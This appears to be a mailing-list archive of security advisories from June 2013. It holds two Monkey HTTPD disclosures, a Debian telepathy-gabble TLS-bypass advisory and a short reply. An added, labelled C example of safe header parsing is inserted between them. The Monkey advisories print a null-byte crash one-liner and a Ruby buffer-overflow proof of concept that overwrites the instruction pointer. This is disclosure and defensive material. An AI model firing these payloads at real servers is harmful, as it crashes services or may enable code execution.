CVE-2013-3724 Monkey HTTPD 1.1.1 - Denial of Service Vulnerability

2013-06-04 Thread dougtko
1. Title

   CVE-2013-3724 Monkey HTTPD 1.1.1 - Denial of Service Vulnerability

2. Introduction

   Monkey is a lightweight and powerful web server for
   GNU/Linux.

   It has been designed to be very scalable with low memory
   and CPU consumption, the perfect solution for embedded
   devices. Made for ARM, x86 and x64.


3. Abstract

   The vulnerability is a denial of service which is caused
   by sending a null byte in an HTTP request to the web
   server.

4. Report Timeline

   2013-05-23  Discovered vulnerability via fuzzing
   2013-05-25  Vendor Notification
   2013-05-26  Vendor Response/Feedback
   2013-05-27  Vendor Fix/Patch
   2013-05-28  Public disclosure

5. Status

  Published

6. Affected Products

  Monkey HTTPD 1.1.1

7. Exploitation Technique

  Remote

8. Details

  A bug discovered in Monkey's HTTP parser allows an
  attacker to cause a segmentation fault in one of the
  daemon's threads using a specially crafted request
  containing a null byte. An attacker can crash all the
  available threads by sending the specially crafted
  request multiple times, rendering the server useless
  for legitimate users.

9. Proof of Concept

  The vulnerability can be exploited by a remote attacker
  without any special privileges. The placement of the
  null byte within the request does not seem to have any
  effect on the result. The null byte may even be used
  instead of an HTTP method such as GET. Below is an
  example of how this bug can be manually triggered:


 ruby -e 'puts "GET /\x00 HTTP/1.1\r\n\r\n"' | netcat localhost 2001


10. Solution

   This vulnerability has been fixed for the 1.2.0 release.

11. Risk

   The security risk of the DoS vulnerability is estimated
   as low.

12. References

   http://bugs.monkey-project.com/ticket/181

13. Credits

   Doug Prostko dougtko[at]gmail[dot]com  Vulnerability discovery


CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS Vulnerability With Possible Arbitrary Code Execution

2013-06-04 Thread dougtko
1. Title

   CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
   Vulnerability With Possible Arbitrary Code Execution

2. Introduction

   Monkey is a lightweight and powerful web server for
   GNU/Linux.

   It has been designed to be very scalable with low memory
   and CPU consumption, the perfect solution for embedded
   devices. Made for ARM, x86 and x64.


3. Abstract

   A specially crafted request sent to the Monkey HTTPD
   server triggers a buffer overflow which can be used to
   control the flow of execution.

4. Report Timeline

   2013-05-29  Discovered vulnerability via fuzzing
   2013-05-30  Vendor Notification

5. Status

  Published

6. Affected Products

  Monkey HTTPD = 1.2.0

7. Exploitation Technique

  Remote

8. Details

  Improper bounds checking while parsing headers allows
  for an attacker to craft a request that will trigger a
  buffer overflow during a call to memcpy() on line 268
  in the file mk_request.c.

9. Proof of Concept

  The vulnerability can be exploited by a remote attacker
  without any special privileges. Under Ubuntu 13.04,
  an offset of 2511 lines up the instruction pointer
  with 0x42424242.


 #!/usr/bin/env ruby

 require 'socket'

 host = 'localhost'
 port = 2001

 s = TCPSocket.open(host, port)

 # Request line and headers, followed by one oversized header value
 buf = "GET / HTTP/1.1\r\n"
 buf << "Host: " + "\r\n"
 buf << "localhost\r\n"
 buf << "Bad: "
 buf << "A" * 2511
 buf << "B" * 4

 s.puts(buf)
 s.close


10. Solution

   There is currently no solution.

11. Risk

   Risk should be considered high since it can be shown that
   the flow of execution can be controlled by an attacker.

12. References

   http://bugs.monkey-project.com/ticket/182

13. Credits

   Doug Prostko dougtko[at]gmail[dot]com  Vulnerability discovery

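As an added example (not Monkey's code and not part of either advisory above), a header-value copy routine in C carrying the two checks whose absence the Monkey reports describe: explicit-length handling that rejects an embedded NUL byte instead of letting it reach string functions, and a destination bounds check before memcpy(). The buffer size, function names and return codes are assumptions chosen for illustration.

```c
#include <stdlib.h>
#include <string.h>

/* Added example, not Monkey's code. The buffer size, names and return codes
 * are assumptions chosen for illustration. */
#define MAX_HEADER_VALUE 256

enum hdr_result { HDR_OK = 0, HDR_NO_SEP = 1, HDR_BAD_BYTE = 2, HDR_TOO_LONG = 3 };

/* Copy the value of one "Name: value" header line into out (capacity
 * MAX_HEADER_VALUE). The line is given by an explicit length and is not
 * assumed NUL-terminated, so a NUL inside the request (the 1.1.1 crash) is
 * rejected up front, and the destination size is checked before memcpy()
 * (the 1.2.0 overflow) instead of trusting the attacker-controlled length. */
int copy_header_value(const char *line, size_t len, char *out)
{
    for (size_t i = 0; i < len; i++)        /* reject NUL and other control bytes */
        if ((unsigned char)line[i] < 0x20 && line[i] != '\t')
            return HDR_BAD_BYTE;
    const char *sep = memchr(line, ':', len);
    if (!sep)
        return HDR_NO_SEP;
    const char *val = sep + 1;
    size_t vlen = len - (size_t)(val - line);
    while (vlen && (*val == ' ' || *val == '\t')) { val++; vlen--; }  /* skip OWS */
    if (vlen >= MAX_HEADER_VALUE)           /* bounds check, leaving room for '\0' */
        return HDR_TOO_LONG;
    memcpy(out, val, vlen);
    out[vlen] = '\0';
    return HDR_OK;
}

/* Constructed input: a "Bad: " header whose value is n_fill filler bytes,
 * the shape of the oversized request in the second advisory. Returns the
 * parser's verdict so the rejection path can be exercised without a server. */
int probe_long_value(size_t n_fill)
{
    const char prefix[] = "Bad: ";
    size_t plen = sizeof(prefix) - 1;
    char out[MAX_HEADER_VALUE];
    char *line = malloc(plen + n_fill);
    if (!line)
        return -1;
    memcpy(line, prefix, plen);
    memset(line + plen, 'A', n_fill);
    int rc = copy_header_value(line, plen + n_fill, out);
    free(line);
    return rc;
}
```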

[SECURITY] [DSA 2702-1] telepathy-gabble security update

2013-06-04 Thread Salvatore Bonaccorso

Debian Security Advisory DSA-2702-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
June 03, 2013  http://www.debian.org/security/faq

Package: telepathy-gabble
Vulnerability  : TLS verification bypass
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-1431

Maksim Otstavnov discovered that the Wocky submodule used by
telepathy-gabble, the Jabber/XMPP connection manager for the Telepathy
framework, does not respect the tls-required flag on legacy Jabber
servers. A network intermediary could use this vulnerability to bypass
TLS verification and perform a man-in-the-middle attack.

For the oldstable distribution (squeeze), this problem has been fixed in
version 0.9.15-1+squeeze2.

For the stable distribution (wheezy), this problem has been fixed in
version 0.16.5-1+deb7u1.

For the testing distribution (jessie) and the unstable distribution
(sid), this problem has been fixed in version 0.16.6-1.

We recommend that you upgrade your telepathy-gabble packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Re: Monkey HTTPD 1.1.1 - Denial of Service Vulnerability

2013-06-04 Thread dougtko
CVE reserved for this bug: CVE-2013-3724